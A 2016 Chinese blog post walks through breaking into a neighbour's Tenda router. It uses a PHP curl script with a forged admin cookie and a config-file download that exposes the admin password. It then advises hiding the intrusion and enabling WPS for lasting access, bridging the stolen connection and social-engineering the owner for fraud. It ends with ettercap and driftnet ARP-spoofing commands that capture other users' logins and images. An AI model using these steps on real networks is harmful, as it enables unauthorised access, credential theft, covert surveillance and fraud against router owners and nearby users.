Saturday, November 26, 2016

绕过路由器后台登陆认证,获得管理权限后...

刚好今天住的地方网络出了问题,就打开手机随便搜索了一下附近的wifi,发现有个可以用钥匙链接,毫不犹豫地连接上去,故事就此展开了:
习惯性地在连接上陌生wifi后进一下后台,用浏览器打开网关,来到这个页面:http://192.168.0.1/login.asp

 



一看,感觉好眼熟啊,这个和之前在乌云看到的那个腾达漏洞很相似啊,为了验证一下,F12后切换到Network选项卡下面,重新请求一遍,发现从首页index.asp 301 跳转到 login.asp ,而且没有cookies,那么是否是真的是那个漏洞呢?利用php的curl写了个简单的脚本:

複製代碼
<?php
echo \"找到路由的备份文件就好了,密码就在里面。腾达的备份文件是RouterCfm.cfg。在工具的地址栏输入:http://192.168.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg,然后点获取当前地址源码。http_passwd就是登陆密码\".'<br>';
$headers = array(
    // 'GET /index.asp http/1.1',
    'Host: 192.168.0.1',
    'Cookie: admin:language=cn;',

);
$url='http://192.168.0.1/index.asp';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 120);
curl_setopt($ch, CURLOPT_httpHEADER, $headers);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
?>


运行后的结果如下:

 

从图上看,基本上可以判断是成功了得,再ctrl+u :

 

开始很纳闷,为啥没有宽带账号/密码,初步判断是静态IP或者是动态获取IP,从图中可以看到wifi密码是八个8--88888888 ,把配置文件下载下来后就可以看到后台的登陆密码了:

 

http_passwd=后面的就是路由器后台登陆密码,当然,你也可以不下载配置文件,直接在后台修改登录密码,但是这样容易被路由器的所有者发现,不建议这样做,进入路由后,如果有wps功能,请帮他打开,哈哈,这样即使他改了密码,你通过wps还是很可以轻松的拿到密码---拿下路由器。

这个漏洞在13年的时候就出来了,而且还有很多成品工具可以一键破解,可是这些厂家和我们的人民 没有多少安全意识,特别是在公共场合的wifi,朋友们在使用的时候,一定要注意,别在这些场所进行资金操作,或者是与个人隐私相关的操作,因为,谁也不知道咋某个角落是否有一个骇客正在监听或者嗅探 or 钓鱼呢? 

那么问题来了,获取账号密码后都可以做些什么呢?


我们再来讨论下获取无线路由账户后可以做的一些小动作。。。


  当你在破解了别人的无线路由器密码的时候,你可能会发现你的信号不太好。当然身为IT屌丝男,肯定是随便携带一个路由器。这里恭喜你可以使用路由器桥接的一种方式来增强你的信号。你是曾经为了信号好一点而摆出这种奇怪的姿势呢,例如这样

   

  反正本人是为了蹭网而摆出了各种奇怪的姿势,自从使用了路由器桥接,腰不酸了腿不痛了编码也有劲了。废话不多说,首先打开自己的路由器。

 

  更改你的Lan口的IP地址,这里假设我改成192.168.1.225.
其次,关闭DHCP自动分配IP地址。因为是要利用对方的路由器分配的IP哦~~嘿嘿

 

然后在基本设置里,开启WDS功能,点击扫描

 

然后选择到你破解的路由器,输入密码,保存即可。
这里需要注意一下,你的路由器信道要与对方路由器信道一致。
接着可以社工了。如果是ADSL用户,你可以直接访问互联星空获取用户的基本信息,在这里我就不演示了。。。隐私。。。。通过隐私的信息,可得知对方的电话。通过IP修改号码的技术,进行诈骗,获取更多的用户信息,然后打电话给移动,冒充户主开通网上消费的业务。。。接着你就可以用宽带来刷钻了。。。。。当然这里也只是我的一些奇技淫巧yy而已,毕竟违法的事情咱是不会做的。
Kali下Arp欺骗的两种方式,一种是iptables还有一种是GUI.iptables。这里使用另一个Gui更方便。。

 

打开软件之后 点击嗅探(Sniff) Unfied Sniffing,因为我这里用的是虚拟机,所以是eth0的方式。如果不知道是什么方式,可以利用ifconfig查看

 

接着点击扫描主机,然后到主机列表。。

 

这里可以看到有三个主机,其中两台是路由器,我桥接别人的嘛。。。这里Target1选择对方路由器,192.168.1.1  Target2则是你需要欺骗的地址。

 

然后在Mitm选项里,选择第一项,把Sniff remote connections给勾上

 

最后开始嗅探

 

这里举例,我打开tudou,点击登录,用户名和密码都是i0ject.

 

然后在嗅探里就得到了结果。。。。

 

得到了用户名和密码。。。。
当然这里不必担心,自心脏出血之后。。。淘宝、微博、百度的传输的密码都已经加密了。。。我不是搞算法的,破不了。。。

当然你还可以这样,打开一个终端窗,root权限执行:
複製代碼
ettercap -i wlan0 -Tq -M arp:remote /192.168.1.101/ /192.168.1.1/ #对目标主机进行arp欺骗


 

新建一个终端窗口,执行:
複製代碼
driftnet -i eth0 #监听eth0


这里我主机随便打开一个页面,例如我打开了百度搜梅西。。。 无视360

 

成功抓取到了。。。。当然你的微信啦,陌陌什么的,QQ空间照片同样都可以抓到
当然你还可以抓包:

 

No comments: